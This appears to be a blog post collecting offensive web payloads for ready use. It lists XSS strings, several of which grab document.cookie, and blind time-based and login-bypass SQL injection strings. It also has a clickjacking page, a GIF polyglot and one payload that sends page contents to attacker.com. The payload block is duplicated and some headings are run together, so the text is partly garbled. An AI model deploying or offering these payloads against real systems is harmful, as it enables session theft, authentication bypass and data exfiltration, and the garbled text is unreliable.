Useful Payloads-1
%uff1cscript%uff1ealert(222)%uff1c/script%uff1e
"><img src=x onerror=alert(document.cookie)>
"><script>alert(222)</script>
test</script><img src=1 onerror=alert(document.domain)>
%uff1cimg src=a onerror=alert("XSS")%uff1e
&qout;<svg/onload=alert(1)>
<iframe src="javascript:alert(`xss`)">
%3cscript%3ealert(1)%3c%2fscript%3e
<script>alert(document.cookie)</script>
<script>alert(Date())</script>
<svg/onload=confirm()>
</script><script >alert(document.cookie)</script>
<img src=asdf onerror=alert(document.cookie)>
<BODY ONLOAD=alert(’XSS’)>
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<img src=”1″ onerror=”alert(1)” />
+ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-
<img src=”1″ onnerror=”alert(1)”>
%E0%80%BCimg%20src%3D%E0%80%A21%E0%80%A2%20onerror%3D%E0%80%A2alert(1)%E0%80%A2%E0%80%BE
<script>\u0061\u006C\u0065\u0072\u0074(123)</script>
Blind time based sqli
' and sleep(10) --+
" and sleep(10) --+
') and sleep(10) --+
How to extract database for blind time based sqli
' and sleep(10) and 1=1 --+
‘ or ‘1’=’1 ture
‘ or ‘1’=’2 false
admin’ or ‘1’=‘1’--+
or 1=1
or 1=1–
or 1=1#
or 1=1/*
admin” or “1”=”1?–
admin” or “1”=”1?#
admin” or “1”=”1?/*
admin”or 1=1 or “”=”
admin” or 1=1
admin” or 1=1–
admin” or 1=1#
admin” or 1=1/*
admin”) or (“1?=”1
admin”) or (“1?=”1”–
admin”) or (“1?=”1?#
admin”) or (“1?=”1?/*
admin”) or “1”=”1
admin”) or “1”=”1?–
admin”) or “1”=”1?#
admin”) or “1”=”1?/*
admin’ --
admin’ #
admin’/*
admin’ or ‘1’=’1
admin’ or ‘1’=’1'–
admin’ or ‘1’=’1’#
admin’ or ‘1’=’1’/*
admin’or 1=1 or ”=’
admin’ or 1=1
admin’ or 1=1–
admin’ or 1=1#
admin’ or 1=1/*
admin’) or (‘1’=’1
admin’) or (‘1’=’1’–
admin’) or (‘1’=’1’#
admin’) or (‘1’=’1’/*
admin’) or ‘1’=’1
admin’) or ‘1’=’1'–
admin’) or ‘1’=’1’#
admin’) or ‘1’=’1’/*
Awesome Exploits-
<svg/onload="(new Image()).src='//attacker.com/'%2Bdocument.documentElement.innerHTML">
GIF-
GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
Click Jacking-
<html>
<head>
<title>Clickjack test page</title>
</head>
<body>
<p>Website is vulnerable to clickjacking!</p>
<iframe src="https://xyz.com" width="1000" height="500"></iframe>
</body>
</html>
iOS Jailbreak-
Checklist-
"><img src=x onerror=alert(document.cookie)>
"><script>alert(222)</script>
test</script><img src=1 onerror=alert(document.domain)>
%uff1cimg src=a onerror=alert("XSS")%uff1e
&qout;<svg/onload=alert(1)>
<iframe src="javascript:alert(`xss`)">
%3cscript%3ealert(1)%3c%2fscript%3e
<script>alert(document.cookie)</script>
<script>alert(Date())</script>
<svg/onload=confirm()>
</script><script >alert(document.cookie)</script>
<img src=asdf onerror=alert(document.cookie)>
<BODY ONLOAD=alert(’XSS’)>
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<img src=”1″ onerror=”alert(1)” />
+ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-
<img src=”1″ onnerror=”alert(1)”>
%E0%80%BCimg%20src%3D%E0%80%A21%E0%80%A2%20onerror%3D%E0%80%A2alert(1)%E0%80%A2%E0%80%BE
<script>\u0061\u006C\u0065\u0072\u0074(123)</script>
Blind time based sqli
' and sleep(10) --+
" and sleep(10) --+
') and sleep(10) --+
How to extract database for blind time based sqli
' and sleep(10) and 1=1 --+
‘ or ‘1’=’1 ture
‘ or ‘1’=’2 false
admin’ or ‘1’=‘1’--+
or 1=1
or 1=1–
or 1=1#
or 1=1/*
admin” or “1”=”1?–
admin” or “1”=”1?#
admin” or “1”=”1?/*
admin”or 1=1 or “”=”
admin” or 1=1
admin” or 1=1–
admin” or 1=1#
admin” or 1=1/*
admin”) or (“1?=”1
admin”) or (“1?=”1”–
admin”) or (“1?=”1?#
admin”) or (“1?=”1?/*
admin”) or “1”=”1
admin”) or “1”=”1?–
admin”) or “1”=”1?#
admin”) or “1”=”1?/*
admin’ --
admin’ #
admin’/*
admin’ or ‘1’=’1
admin’ or ‘1’=’1'–
admin’ or ‘1’=’1’#
admin’ or ‘1’=’1’/*
admin’or 1=1 or ”=’
admin’ or 1=1
admin’ or 1=1–
admin’ or 1=1#
admin’ or 1=1/*
admin’) or (‘1’=’1
admin’) or (‘1’=’1’–
admin’) or (‘1’=’1’#
admin’) or (‘1’=’1’/*
admin’) or ‘1’=’1
admin’) or ‘1’=’1'–
admin’) or ‘1’=’1’#
admin’) or ‘1’=’1’/*
Awesome Exploits-
<svg/onload="(new Image()).src='//attacker.com/'%2Bdocument.documentElement.innerHTML">
GIF-
GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
Click Jacking-
<html>
<head>
<title>Clickjack test page</title>
</head>
<body>
<p>Website is vulnerable to clickjacking!</p>
<iframe src="https://xyz.com" width="1000" height="500"></iframe>
</body>
</html>
iOS Jailbreak-
https://jbme.qwertyoruiop.com/
DTD Cheat Sheet-
https://web-in-security.blogspot.com/2016/03/xxe-cheat-sheet.html
Medium Reading-
https://medium.com/@int0x33
Tool-
https://tinyurl.com/y5nyo9y6DTD Cheat Sheet-
https://web-in-security.blogspot.com/2016/03/xxe-cheat-sheet.html
Medium Reading-
https://medium.com/@int0x33
Tool-
Checklist-
Comments
Post a Comment